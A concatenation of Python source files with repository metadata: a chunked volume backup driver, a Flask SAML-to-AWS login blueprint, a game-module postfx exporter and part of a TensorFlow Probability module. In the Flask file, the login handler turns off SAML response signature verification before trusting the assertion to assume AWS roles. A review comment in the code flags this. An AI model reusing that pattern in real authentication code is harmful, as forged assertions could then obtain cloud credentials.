            elif algorithm.lower() in ('bz2', 'bzip2'):
                import bz2 as compressor
                return compressor
        except ImportError:
            pass
        err = _('unsupported compression algorithm: %s') % algorithm
        raise ValueError(err)
    def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
                 backup_default_container, enable_progress_timer,
                 db=None):
        # chunk_size_bytes must be a multiple of sha_block_size_bytes;
        # backup() enforces this before any data is transferred.
        super(ChunkedBackupDriver, self).__init__(context, db)
        self.chunk_size_bytes = chunk_size_bytes
        self.sha_block_size_bytes = sha_block_size_bytes
        self.backup_default_container = backup_default_container
        self.enable_progress_timer = enable_progress_timer
        self.backup_timer_interval = CONF.backup_timer_interval
        self.data_block_num = CONF.backup_object_number_per_notification
        self.az = CONF.storage_availability_zone
        self.backup_compression_algorithm = CONF.backup_compression_algorithm
        self.compressor = \
            self._get_compressor(CONF.backup_compression_algorithm)
        self.support_force_delete = True
    # To create your own "chunked" backup driver, implement the following
    # abstract methods.
    @abc.abstractmethod
    def put_container(self, container):
        """Create the container if needed. No failure if it pre-exists."""
        return
    @abc.abstractmethod
    def get_container_entries(self, container, prefix):
        """Get container entry names."""
        return
    @abc.abstractmethod
    def get_object_writer(self, container, object_name, extra_metadata=None):
        """Returns a writer object which stores the chunk data in backup repository.
        The object returned should be a context handler that can be used
        in a "with" context.
        """
        return
    @abc.abstractmethod
    def get_object_reader(self, container, object_name, extra_metadata=None):
        """Returns a reader object for the backed up chunk."""
        return
    @abc.abstractmethod
    def delete_object(self, container, object_name):
        """Delete object from container."""
        return
    @abc.abstractmethod
    def _generate_object_name_prefix(self, backup):
        # Prefix shared by every object of one backup; it is persisted in
        # backup.service_metadata so objects can be located later.
        return
    @abc.abstractmethod
    def update_container_name(self, backup, container):
        """Allow sub-classes to override container name.
        This method exists so that sub-classes can override the container name
        as it comes in to the driver in the backup object. Implementations
        should return None if no change to the container name is desired.
        """
        return
    @abc.abstractmethod
    def get_extra_metadata(self, backup, volume):
        """Return extra metadata to use in prepare_backup.
        This method allows for collection of extra metadata in prepare_backup()
        which will be passed to get_object_reader() and get_object_writer().
        Subclass extensions can use this extra information to optimize
        data transfers. Return a json serializable object.
        """
        return
    def _create_container(self, backup):
        # Container's name will be decided by the driver (returned by method
        # update_container_name), if no change is required by the driver then
        # we'll use the one the backup object already has, but if it doesn't
        # have one backup_default_container will be used.
        new_container = self.update_container_name(backup, backup.container)
        if new_container:
            # If the driver is not really changing the name we don't want to
            # dirty the field in the object and save it to the DB with the same
            # value.
            if new_container != backup.container:
                backup.container = new_container
        elif backup.container is None:
            backup.container = self.backup_default_container
        LOG.debug('_create_container started, container: %(container)s,'
                  'backup: %(backup_id)s.',
                  {'container': backup.container, 'backup_id': backup.id})
        backup.save()
        self.put_container(backup.container)
        return backup.container
    def _generate_object_names(self, backup):
        """List the repository object names belonging to *backup*."""
        prefix = backup['service_metadata']
        object_names = self.get_container_entries(backup['container'], prefix)
        LOG.debug('generated object list: %s.', object_names)
        return object_names
    def _metadata_filename(self, backup):
        """Name of the object that stores the backup's metadata."""
        object_name = backup['service_metadata']
        filename = '%s_metadata' % object_name
        return filename
    def _sha256_filename(self, backup):
        """Name of the object that stores the backup's SHA-256 block hashes."""
        object_name = backup['service_metadata']
        filename = '%s_sha256file' % object_name
        return filename
    def _write_metadata(self, backup, volume_id, container, object_list,
                        volume_meta, extra_metadata=None):
        """Serialize the backup description to JSON and store it in the
        repository under the metadata object name."""
        filename = self._metadata_filename(backup)
        LOG.debug('_write_metadata started, container name: %(container)s,'
                  ' metadata filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        metadata = {}
        metadata['version'] = self.DRIVER_VERSION
        metadata['backup_id'] = backup['id']
        metadata['volume_id'] = volume_id
        metadata['backup_name'] = backup['display_name']
        metadata['backup_description'] = backup['display_description']
        metadata['created_at'] = str(backup['created_at'])
        metadata['objects'] = object_list
        metadata['parent_id'] = backup['parent_id']
        metadata['volume_meta'] = volume_meta
        if extra_metadata:
            metadata['extra_metadata'] = extra_metadata
        metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
        if six.PY3:
            metadata_json = metadata_json.encode('utf-8')
        with self.get_object_writer(container, filename) as writer:
            writer.write(metadata_json)
        LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
    def _write_sha256file(self, backup, volume_id, container, sha256_list):
        """Store the list of per-block SHA-256 hashes used by incremental
        backups to detect changed extents."""
        filename = self._sha256_filename(backup)
        LOG.debug('_write_sha256file started, container name: %(container)s,'
                  ' sha256file filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        sha256file = {}
        sha256file['version'] = self.DRIVER_VERSION
        sha256file['backup_id'] = backup['id']
        sha256file['volume_id'] = volume_id
        sha256file['backup_name'] = backup['display_name']
        sha256file['backup_description'] = backup['display_description']
        sha256file['created_at'] = six.text_type(backup['created_at'])
        sha256file['chunk_size'] = self.sha_block_size_bytes
        sha256file['sha256s'] = sha256_list
        sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
        if six.PY3:
            sha256file_json = sha256file_json.encode('utf-8')
        with self.get_object_writer(container, filename) as writer:
            writer.write(sha256file_json)
        LOG.debug('_write_sha256file finished.')
    def _read_metadata(self, backup):
        """Load and deserialize the backup's metadata object."""
        container = backup['container']
        filename = self._metadata_filename(backup)
        LOG.debug('_read_metadata started, container name: %(container)s, '
                  'metadata filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        with self.get_object_reader(container, filename) as reader:
            metadata_json = reader.read()
        if six.PY3:
            metadata_json = metadata_json.decode('utf-8')
        metadata = json.loads(metadata_json)
        LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
        return metadata
    def _read_sha256file(self, backup):
        """Load and deserialize the backup's SHA-256 hash-list object."""
        container = backup['container']
        filename = self._sha256_filename(backup)
        LOG.debug('_read_sha256file started, container name: %(container)s, '
                  'sha256 filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        with self.get_object_reader(container, filename) as reader:
            sha256file_json = reader.read()
        if six.PY3:
            sha256file_json = sha256file_json.decode('utf-8')
        sha256file = json.loads(sha256file_json)
        LOG.debug('_read_sha256file finished.')
        return sha256file
    def _prepare_backup(self, backup):
        """Prepare the backup process and return the backup metadata."""
        volume = self.db.volume_get(self.context, backup.volume_id)
        if volume['size'] <= 0:
            err = _('volume size %d is invalid.') % volume['size']
            raise exception.InvalidVolume(reason=err)
        container = self._create_container(backup)
        object_prefix = self._generate_object_name_prefix(backup)
        backup.service_metadata = object_prefix
        backup.save()
        volume_size_bytes = volume['size'] * units.Gi
        availability_zone = self.az
        LOG.debug('starting backup of volume: %(volume_id)s,'
                  ' volume size: %(volume_size_bytes)d, object names'
                  ' prefix %(object_prefix)s, availability zone:'
                  ' %(availability_zone)s',
                  {
                      'volume_id': backup.volume_id,
                      'volume_size_bytes': volume_size_bytes,
                      'object_prefix': object_prefix,
                      'availability_zone': availability_zone,
                  })
        # Mutable accumulators threaded through _backup_chunk and
        # _finalize_backup; 'id' is the next chunk number (1-based).
        object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
                       'volume_meta': None}
        object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
        extra_metadata = self.get_extra_metadata(backup, volume)
        if extra_metadata is not None:
            object_meta['extra_metadata'] = extra_metadata
        return (object_meta, object_sha256, extra_metadata, container,
                volume_size_bytes)
    def _backup_chunk(self, backup, container, data, data_offset,
                      object_meta, extra_metadata):
        """Backup data chunk based on the object metadata and offset."""
        object_prefix = object_meta['prefix']
        object_list = object_meta['list']
        object_id = object_meta['id']
        object_name = '%s-%05d' % (object_prefix, object_id)
        obj = {}
        obj[object_name] = {}
        obj[object_name]['offset'] = data_offset
        obj[object_name]['length'] = len(data)
        LOG.debug('Backing up chunk of data from volume.')
        algorithm, output_data = self._prepare_output_data(data)
        obj[object_name]['compression'] = algorithm
        LOG.debug('About to put_object')
        with self.get_object_writer(
                container, object_name, extra_metadata=extra_metadata
        ) as writer:
            writer.write(output_data)
        # MD5 of the *uncompressed* chunk; integrity checksum, not security.
        md5 = hashlib.md5(data).hexdigest()
        obj[object_name]['md5'] = md5
        LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
                  {'object_name': object_name, 'md5': md5})
        object_list.append(obj)
        object_id += 1
        object_meta['list'] = object_list
        object_meta['id'] = object_id
        LOG.debug('Calling eventlet.sleep(0)')
        eventlet.sleep(0)
    def _prepare_output_data(self, data):
        """Compress *data* if configured and worthwhile; return the
        (algorithm, payload) pair actually stored for the chunk."""
        if self.compressor is None:
            return 'none', data
        data_size_bytes = len(data)
        # Execute compression in native thread so it doesn't prevent
        # cooperative greenthread switching.
        compressed_data = eventlet.tpool.execute(self.compressor.compress,
                                                 data)
        comp_size_bytes = len(compressed_data)
        algorithm = CONF.backup_compression_algorithm.lower()
        if comp_size_bytes >= data_size_bytes:
            LOG.debug('Compression of this chunk was ineffective: '
                      'original length: %(data_size_bytes)d, '
                      'compressed length: %(compressed_size_bytes)d. '
                      'Using original data for this chunk.',
                      {'data_size_bytes': data_size_bytes,
                       'compressed_size_bytes': comp_size_bytes,
                       })
            return 'none', data
        LOG.debug('Compressed %(data_size_bytes)d bytes of data '
                  'to %(comp_size_bytes)d bytes using %(algorithm)s.',
                  {'data_size_bytes': data_size_bytes,
                   'comp_size_bytes': comp_size_bytes,
                   'algorithm': algorithm,
                   })
        return algorithm, compressed_data
    def _finalize_backup(self, backup, container, object_meta, object_sha256):
        """Write the backup's metadata to the backup repository."""
        object_list = object_meta['list']
        object_id = object_meta['id']
        volume_meta = object_meta['volume_meta']
        sha256_list = object_sha256['sha256s']
        extra_metadata = object_meta.get('extra_metadata')
        self._write_sha256file(backup,
                               backup.volume_id,
                               container,
                               sha256_list)
        self._write_metadata(backup,
                             backup.volume_id,
                             container,
                             object_list,
                             volume_meta,
                             extra_metadata)
        backup.object_count = object_id
        backup.save()
        LOG.debug('backup %s finished.', backup['id'])
    def _backup_metadata(self, backup, object_meta):
        """Backup volume metadata.
        NOTE(dosaboy): the metadata we are backing up is obtained from a
                       versioned api so we should not alter it in any way here.
                       We must also be sure that the service that will perform
                       the restore is compatible with version used.
        """
        json_meta = self.get_metadata(backup['volume_id'])
        if not json_meta:
            LOG.debug("No volume metadata to backup.")
            return
        object_meta["volume_meta"] = json_meta
    def _send_progress_end(self, context, backup, object_meta):
        # Final progress notification: always 100%.
        object_meta['backup_percent'] = 100
        volume_utils.notify_about_backup_usage(context,
                                               backup,
                                               "createprogress",
                                               extra_usage_info=
                                               object_meta)
    def _send_progress_notification(self, context, backup, object_meta,
                                    total_block_sent_num, total_volume_size):
        backup_percent = total_block_sent_num * 100 / total_volume_size
        object_meta['backup_percent'] = backup_percent
        volume_utils.notify_about_backup_usage(context,
                                               backup,
                                               "createprogress",
                                               extra_usage_info=
                                               object_meta)
    def backup(self, backup, volume_file, backup_metadata=True):
        """Backup the given volume.
           If backup['parent_id'] is given, then an incremental backup
           is performed.
        """
        if self.chunk_size_bytes % self.sha_block_size_bytes:
            err = _('Chunk size is not multiple of '
                    'block size for creating hash.')
            raise exception.InvalidBackup(reason=err)
        # Read the shafile of the parent backup if backup['parent_id']
        # is given.
        parent_backup_shafile = None
        parent_backup = None
        if backup.parent_id:
            parent_backup = objects.Backup.get_by_id(self.context,
                                                     backup.parent_id)
            parent_backup_shafile = self._read_sha256file(parent_backup)
            parent_backup_shalist = parent_backup_shafile['sha256s']
            if (parent_backup_shafile['chunk_size'] !=
                    self.sha_block_size_bytes):
                err = (_('Hash block size has changed since the last '
                         'backup. New hash block size: %(new)s. Old hash '
                         'block size: %(old)s. Do a full backup.')
                       % {'old': parent_backup_shafile['chunk_size'],
                          'new': self.sha_block_size_bytes})
                raise exception.InvalidBackup(reason=err)
            # If the volume size increased since the last backup, fail
            # the incremental backup and ask user to do a full backup.
            if backup.size > parent_backup.size:
                err = _('Volume size increased since the last '
                        'backup. Do a full backup.')
                raise exception.InvalidBackup(reason=err)
        (object_meta, object_sha256, extra_metadata, container,
         volume_size_bytes) = self._prepare_backup(backup)
        counter = 0
        total_block_sent_num = 0
        # There are two mechanisms to send the progress notification.
        # 1. The notifications are periodically sent in a certain interval.
        # 2. The notifications are sent after a certain number of chunks.
        # Both of them are working simultaneously during the volume backup,
        # when "chunked" backup drivers are deployed.
        def _notify_progress():
            self._send_progress_notification(self.context, backup,
                                             object_meta,
                                             total_block_sent_num,
                                             volume_size_bytes)
        timer = loopingcall.FixedIntervalLoopingCall(
            _notify_progress)
        if self.enable_progress_timer:
            timer.start(interval=self.backup_timer_interval)
        sha256_list = object_sha256['sha256s']
        shaindex = 0
        is_backup_canceled = False
        while True:
            # First of all, we check the status of this backup. If it
            # has been changed to delete or has been deleted, we cancel the
            # backup process to do forcing delete.
            backup = objects.Backup.get_by_id(self.context, backup.id)
            if backup.status in (fields.BackupStatus.DELETING,
                                 fields.BackupStatus.DELETED):
                is_backup_canceled = True
                # To avoid the chunk left when deletion complete, need to
                # clean up the object of chunk again.
                self.delete_backup(backup)
                LOG.debug('Cancel the backup process of %s.', backup.id)
                break
            data_offset = volume_file.tell()
            data = volume_file.read(self.chunk_size_bytes)
            if data == b'':
                break
            # Calculate new shas with the datablock.
            shalist = []
            off = 0
            datalen = len(data)
            while off < datalen:
                chunk_start = off
                chunk_end = chunk_start + self.sha_block_size_bytes
                if chunk_end > datalen:
                    chunk_end = datalen
                chunk = data[chunk_start:chunk_end]
                sha = hashlib.sha256(chunk).hexdigest()
                shalist.append(sha)
                off += self.sha_block_size_bytes
            sha256_list.extend(shalist)
            # If parent_backup is not None, that means an incremental
            # backup will be performed.
            if parent_backup:
                # Find the extent that needs to be backed up.
                extent_off = -1
                for idx, sha in enumerate(shalist):
                    if sha != parent_backup_shalist[shaindex]:
                        if extent_off == -1:
                            # Start of new extent.
                            extent_off = idx * self.sha_block_size_bytes
                    else:
                        if extent_off != -1:
                            # We've reached the end of extent.
                            extent_end = idx * self.sha_block_size_bytes
                            segment = data[extent_off:extent_end]
                            self._backup_chunk(backup, container, segment,
                                               data_offset + extent_off,
                                               object_meta,
                                               extra_metadata)
                            extent_off = -1
                    shaindex += 1
                # The last extent extends to the end of data buffer.
                if extent_off != -1:
                    extent_end = datalen
                    segment = data[extent_off:extent_end]
                    self._backup_chunk(backup, container, segment,
                                       data_offset + extent_off,
                                       object_meta, extra_metadata)
                    extent_off = -1
            else:  # Do a full backup.
                self._backup_chunk(backup, container, data, data_offset,
                                   object_meta, extra_metadata)
            # Notifications
            total_block_sent_num += self.data_block_num
            counter += 1
            if counter == self.data_block_num:
                # Send the notification to Ceilometer when the chunk
                # number reaches the data_block_num.  The backup percentage
                # is put in the metadata as the extra information.
                self._send_progress_notification(self.context, backup,
                                                 object_meta,
                                                 total_block_sent_num,
                                                 volume_size_bytes)
                # Reset the counter
                counter = 0
        # Stop the timer.
        timer.stop()
        # If backup has been cancelled we have nothing more to do
        # but timer.stop().
        if is_backup_canceled:
            return
        # All the data have been sent, the backup_percent reaches 100.
        self._send_progress_end(self.context, backup, object_meta)
        object_sha256['sha256s'] = sha256_list
        if backup_metadata:
            try:
                self._backup_metadata(backup, object_meta)
            # Whatever goes wrong, we want to log, cleanup, and re-raise.
            except Exception:
                with excutils.save_and_reraise_exception():
                    LOG.exception("Backup volume metadata failed.")
                    self.delete_backup(backup)
        self._finalize_backup(backup, container, object_meta, object_sha256)
    def _restore_v1(self, backup, volume_id, metadata, volume_file):
        """Restore a v1 volume backup."""
        backup_id = backup['id']
        LOG.debug('v1 volume backup restore of %s started.', backup_id)
        extra_metadata = metadata.get('extra_metadata')
        container = backup['container']
        metadata_objects = metadata['objects']
        metadata_object_names = []
        for obj in metadata_objects:
            metadata_object_names.extend(obj.keys())
        LOG.debug('metadata_object_names = %s.', metadata_object_names)
        # The metadata and sha256 objects are bookkeeping, not volume data.
        prune_list = [self._metadata_filename(backup),
                      self._sha256_filename(backup)]
        object_names = [object_name for object_name in
                        self._generate_object_names(backup)
                        if object_name not in prune_list]
        if sorted(object_names) != sorted(metadata_object_names):
            err = _('restore_backup aborted, actual object list '
                    'does not match object list stored in metadata.')
            raise exception.InvalidBackup(reason=err)
        for metadata_object in metadata_objects:
            object_name, obj = list(metadata_object.items())[0]
            LOG.debug('restoring object. backup: %(backup_id)s, '
                      'container: %(container)s, object name: '
                      '%(object_name)s, volume: %(volume_id)s.',
                      {
                          'backup_id': backup_id,
                          'container': container,
                          'object_name': object_name,
                          'volume_id': volume_id,
                      })
            with self.get_object_reader(
                    container, object_name,
                    extra_metadata=extra_metadata) as reader:
                body = reader.read()
            compression_algorithm = metadata_object[object_name]['compression']
            decompressor = self._get_compressor(compression_algorithm)
            # Each chunk is written back at the offset recorded at backup time.
            volume_file.seek(obj['offset'])
            if decompressor is not None:
                LOG.debug('decompressing data using %s algorithm',
                          compression_algorithm)
                decompressed = decompressor.decompress(body)
                volume_file.write(decompressed)
            else:
                volume_file.write(body)
            # force flush every write to avoid long blocking write on close
            volume_file.flush()
            # Be tolerant to IO implementations that do not support fileno()
            try:
                fileno = volume_file.fileno()
            except IOError:
                LOG.info("volume_file does not support fileno() so skipping "
                         "fsync()")
            else:
                os.fsync(fileno)
            # Restoring a backup to a volume can take some time. Yield so other
            # threads can run, allowing for among other things the service
            # status to be updated
            eventlet.sleep(0)
        LOG.debug('v1 volume backup restore of %s finished.',
                  backup_id)
    def restore(self, backup, volume_id, volume_file):
        """Restore the given volume backup from backup repository."""
        backup_id = backup['id']
        container = backup['container']
        object_prefix = backup['service_metadata']
        LOG.debug('starting restore of backup %(object_prefix)s '
                  'container: %(container)s, to volume %(volume_id)s, '
                  'backup: %(backup_id)s.',
                  {
                      'object_prefix': object_prefix,
                      'container': container,
                      'volume_id': volume_id,
                      'backup_id': backup_id,
                  })
        metadata = self._read_metadata(backup)
        metadata_version = metadata['version']
        LOG.debug('Restoring backup version %s', metadata_version)
        try:
            restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
                metadata_version))
        except TypeError:
            # .get() returned None for an unknown version; getattr(self, None)
            # raises TypeError, which we translate to InvalidBackup.
            err = (_('No support to restore backup version %s')
                   % metadata_version)
            raise exception.InvalidBackup(reason=err)
        # Build a list of backups based on parent_id. A full backup
        # will be the last one in the list.
        backup_list = []
        backup_list.append(backup)
        current_backup = backup
        while current_backup.parent_id:
            prev_backup = objects.Backup.get_by_id(self.context,
                                                   current_backup.parent_id)
            backup_list.append(prev_backup)
            current_backup = prev_backup
        # Do a full restore first, then layer the incremental backups
        # on top of it in order.
        index = len(backup_list) - 1
        while index >= 0:
            backup1 = backup_list[index]
            index = index - 1
            metadata = self._read_metadata(backup1)
            restore_func(backup1, volume_id, metadata, volume_file)
            volume_meta = metadata.get('volume_meta', None)
            try:
                if volume_meta:
                    self.put_metadata(volume_id, volume_meta)
                else:
                    LOG.debug("No volume metadata in this backup.")
            except exception.BackupMetadataUnsupportedVersion:
                msg = _("Metadata restore failed due to incompatible version.")
                LOG.error(msg)
                raise exception.BackupOperationError(msg)
        LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
                  {'backup_id': backup_id, 'volume_id': volume_id})
    def delete_backup(self, backup):
        """Delete the given backup."""
        container = backup['container']
        object_prefix = backup['service_metadata']
        LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
                  'prefix: %(pre)s.',
                  {'id': backup['id'],
                   'cont': container,
                   'pre': object_prefix})
        if container is not None and object_prefix is not None:
            object_names = []
            try:
                object_names = self._generate_object_names(backup)
            except Exception:
                # Best-effort delete: a listing failure must not block
                # removal of the backup record.
                LOG.warning('Error while listing objects, continuing'
                            ' with delete.')
            for object_name in object_names:
                self.delete_object(container, object_name)
                LOG.debug('deleted object: %(object_name)s'
                          ' in container: %(container)s.',
                          {
                              'object_name': object_name,
                              'container': container
                          })
                # Deleting a backup's objects can take some time.
                # Yield so other threads can run
                eventlet.sleep(0)
        LOG.debug('delete %s finished.', backup['id'])
| 43.64698 | 84 | 0.584371 |
147a6bf0bb56cdd6ac097cbced23164597f83d22 | 2,745 | py | Python | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | null | null | null | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | 1 | 2021-05-30T23:35:23.000Z | 2021-05-30T23:35:23.000Z | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | null | null | null | from flask import Blueprint, session, render_template, url_for, request
from saml2 import entity
from common import (
SariConfig,
get_boto3_session,
saml_client_for,
saml_disable_response_verify,
saml_enum_account_aliases,
saml_enum_aws_roles,
sts_assume_role_with_saml,
)
# Fall back to a placeholder version when the build-generated version
# module is absent (e.g. when running from a plain source checkout).
try:
    # noinspection PyUnresolvedReferences
    from version import app_version
except ModuleNotFoundError:
    app_version = "LATEST"
# Blueprint holding the browser-facing (SAML login) routes.
web_bp = Blueprint('web_bp', __name__)
@web_bp.route("/saml/idp/<idp_name>", methods=['POST'])
def idp_initiated(idp_name):
    """Handle an IdP-initiated SAML login POST.

    Parses the ``SAMLResponse`` form field, records the authenticated
    user in the session, then either renders the DB-configuration page
    (single AWS account, or an account already chosen via the form) or
    an account-selection page when the assertion carries several roles.
    """
    acs_url = url_for("web_bp.idp_initiated", idp_name=idp_name, _external=True)
    saml_client = saml_client_for(acs_url)
    saml_assertion = request.form['SAMLResponse']
    # NOTE(review): this disables SAML response signature verification --
    # confirm this is intentional and safe for this deployment.
    saml_disable_response_verify()
    authn_response = saml_client.parse_authn_request_response(saml_assertion, entity.BINDING_HTTP_POST)
    user_info = authn_response.get_subject()
    session["login"] = user_info.text
    session["app_version"] = app_version
    aws_roles = saml_enum_aws_roles(authn_response)
    accounts = saml_enum_account_aliases(authn_response)
    if not aws_roles:
        raise ValueError("Invalid assertion: no roles defined")
    if len(aws_roles) == 1:
        # Only one account available: no need to ask the user.
        account_id = next(iter(aws_roles))
    elif 'account_id' in request.form:
        account_id = request.form['account_id']
    else:
        # Several accounts and none chosen yet: ask the user to pick one.
        return render_template('select_account/page.html', accounts=accounts, saml_assertion=saml_assertion,
                               session_timeout=authn_response.not_on_or_after)
    role_arn, principal_arn = aws_roles[account_id]
    aws_credentials = sts_assume_role_with_saml(role_arn, principal_arn, saml_assertion)
    session["aws_credentials"] = aws_credentials
    session["sari_config"] = SariConfig.from_aws(get_boto3_session(aws_credentials)).to_json()
    account = dict(alias=accounts[account_id], id=account_id)
    return render_template('db_config/page.html', session=session, aws_account=account,
                           session_timeout=int(aws_credentials['Expiration'].timestamp()))
@web_bp.route("/logout", methods=["POST"])
def logout():
    """Log the user out and show the farewell page."""
    farewell_heading = "You are logged out!"
    return do_farewell(header1=farewell_heading)
# noinspection PyUnusedLocal
@web_bp.errorhandler(404)
def error_not_found(error):
    """Render the farewell page for unknown URLs (HTTP 404)."""
    heading = "Oops!"
    subheading = "The requested page was not found"
    return do_farewell(header1=heading, header2=subheading, emoji="sad")
def do_farewell(header1, header2=None, emoji=None):
    """Clear AWS-related session state and render the farewell page."""
    session["aws_credentials"] = {}
    session["sari_config"] = {}
    image_path = f'images/{emoji or "see-ya"}.png'
    context = {
        "header1": header1,
        "header2": header2 or "",
        "emoji_url": url_for('static', filename=image_path),
    }
    return render_template('farewell.html', **context)
6d58f7c5436191959abdd0432ef4fb2518633e07 | 1,196 | py | Python | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 14 | 2018-09-20T23:01:27.000Z | 2021-05-25T11:05:09.000Z | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 44 | 2018-09-15T03:05:50.000Z | 2022-03-22T02:46:24.000Z | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 13 | 2018-10-02T11:45:24.000Z | 2021-08-22T18:41:44.000Z | from header_common import *
from module_info import *
from module_postfx import *
def write_python_header(postfx_params_list):
    """Export ./ID_postfx_params.py mapping each postfx name to its index.

    Each entry becomes a line ``pfx_<name> = <index>``.
    Fixes: the original used the Python-2-only ``xrange`` builtin and
    shadowed the builtin name ``file``; ``enumerate`` is equivalent and
    works on both Python 2 and 3.
    """
    out = open("./ID_postfx_params.py", "w")
    for index, postfx_param in enumerate(postfx_params_list):
        out.write("pfx_%s = %d\n" % (postfx_param[0], index))
    out.write("\n\n")
    out.close()
def write_postfx_params(postfx_params_list):
    """Write the postfx.txt export consumed by the game engine.

    Each record is: ``pfx_<name> <flags> <priority>`` followed by three
    groups of four floats, all on one line.
    """
    out = open(export_dir + "postfx.txt", "w")
    out.write("postfx_paramsfile version 1\n")
    out.write("%d\n" % len(postfx_params_list))
    for postfx_param in postfx_params_list:
        out.write("pfx_%s %d %d" % (postfx_param[0], postfx_param[1], postfx_param[2]))
        # Entries 3..5 are each a list of four float parameters.
        for quad in (postfx_param[3], postfx_param[4], postfx_param[5]):
            out.write(" %f %f %f %f" % (quad[0], quad[1], quad[2], quad[3]))
        out.write("\n")
    out.close()
# Module entry point (Python 2 print statement, as in the rest of the
# Warband module system): export both the engine file and the Python
# constants header.
print "Exporting postfx_params..."
write_postfx_params(postfx_params)
write_python_header(postfx_params)
| 41.241379 | 103 | 0.724916 |
78400bf80e36b79368d93c3579f3bfff6961b30a | 18,464 | py | Python | src/models/find_hyperparameters_svi_methods.py | beamlab-hsph/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | 1 | 2021-12-16T07:04:42.000Z | 2021-12-16T07:04:42.000Z | src/models/find_hyperparameters_svi_methods.py | valeman/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | null | null | null | src/models/find_hyperparameters_svi_methods.py | valeman/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | 1 | 2021-12-16T07:04:07.000Z | 2021-12-16T07:04:07.000Z |
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
import tensorflow_probability as tfp
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
import h5py
import kerastuner as kt
from datetime import datetime
import argparse
from data_utils import *
# Short aliases used throughout this module.
keras = tf.keras
tfd = tfp.distributions
gfile = tf.io.gfile
"""
Some of the model building code has been adapted from
https://github.com/google-research/google-research/tree/master/uq_benchmark_2019
Thanks to the work of these researchers and see there for more info!
"""
# Loss: negative log-likelihood of the targets under the predicted
# distribution (the model outputs a tfp distribution object).
negative_log_likelihood = lambda x, rv_x: -rv_x.log_prob(x)
def _posterior_mean_field(kernel_size, bias_size=0, dtype=None):
    """Posterior function for variational layer.

    Builds a mean-field (fully factorized) Gaussian posterior over the
    kernel and bias: the first n trainable values are the means, the
    second n parameterize the softplus-transformed standard deviations.
    """
    n = kernel_size + bias_size
    # Offset chosen so the initial posterior stddev is ~1e-5 after softplus.
    c = np.log(np.expm1(1e-5))
    variable_layer = tfp.layers.VariableLayer(
        2 * n, dtype=dtype,
        initializer=tfp.layers.BlockwiseInitializer([
            keras.initializers.TruncatedNormal(mean=0., stddev=0.05, seed=None),
            keras.initializers.Constant(np.log(np.expm1(1e-5)))], sizes=[n, n]))

    def distribution_fn(t):
        # First half of t: means; second half: raw scale parameters.
        scale = 1e-5 + tf.nn.softplus(c + t[Ellipsis, n:])
        return tfd.Independent(tfd.Normal(loc=t[Ellipsis, :n], scale=scale),
                               reinterpreted_batch_ndims=1)
    distribution_layer = tfp.layers.DistributionLambda(distribution_fn)
    return tf.keras.Sequential([variable_layer, distribution_layer])
def _make_prior_fn(kernel_size, bias_size=0, dtype=None):
    """Return a prior builder yielding a standard-normal prior over the
    concatenated kernel and bias weights."""
    del dtype  # kept for signature compatibility; the prior ignores dtype
    prior_loc = tf.zeros(kernel_size + bias_size)

    def _standard_normal_prior(_):
        base = tfd.Normal(loc=prior_loc, scale=1)
        return tfd.Independent(base, reinterpreted_batch_ndims=1)

    return _standard_normal_prior
def make_divergence_fn_for_empirical_bayes(std_prior_scale, examples_per_epoch):
    """Return a KL-divergence function for empirical-Bayes variational
    layers, with a LogNormal hyper-prior on the prior's stddev and the
    result scaled down by the number of batches per epoch."""
    def divergence_fn(q, p, _):
        scale_log_probs = tfd.LogNormal(0., std_prior_scale).log_prob(p.stddev())
        penalized_kl = tfd.kl_divergence(q, p) - tf.reduce_sum(scale_log_probs)
        return penalized_kl / examples_per_epoch
    return divergence_fn
def make_prior_fn_for_empirical_bayes(init_scale_mean=-1, init_scale_std=0.1):
    """Returns a prior function with stateful parameters for EB models.

    The prior's scale is a non-trainable variable (fit via the empirical
    Bayes penalty in the divergence function) while its location is
    trainable.
    """
    def prior_fn(dtype, shape, name, _, add_variable_fn):
        """A prior for the variational layers."""
        untransformed_scale = add_variable_fn(
            name=name + '_untransformed_scale',
            shape=(1,),
            initializer=tf.compat.v1.initializers.random_normal(
                mean=init_scale_mean, stddev=init_scale_std),
            dtype=dtype,
            trainable=False)
        loc = add_variable_fn(
            name=name + '_loc',
            initializer=keras.initializers.Zeros(),
            shape=shape,
            dtype=dtype,
            trainable=True)
        # Softplus keeps the scale positive; 1e-6 avoids degenerate zero scale.
        scale = 1e-6 + tf.nn.softplus(untransformed_scale)
        dist = tfd.Normal(loc=loc, scale=scale)
        batch_ndims = tf.size(input=dist.batch_shape_tensor())
        return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)
    return prior_fn
def dense_variational(units, activation, initial_kl_weight):
    """Build a variational dense layer with an annealed KL weight.

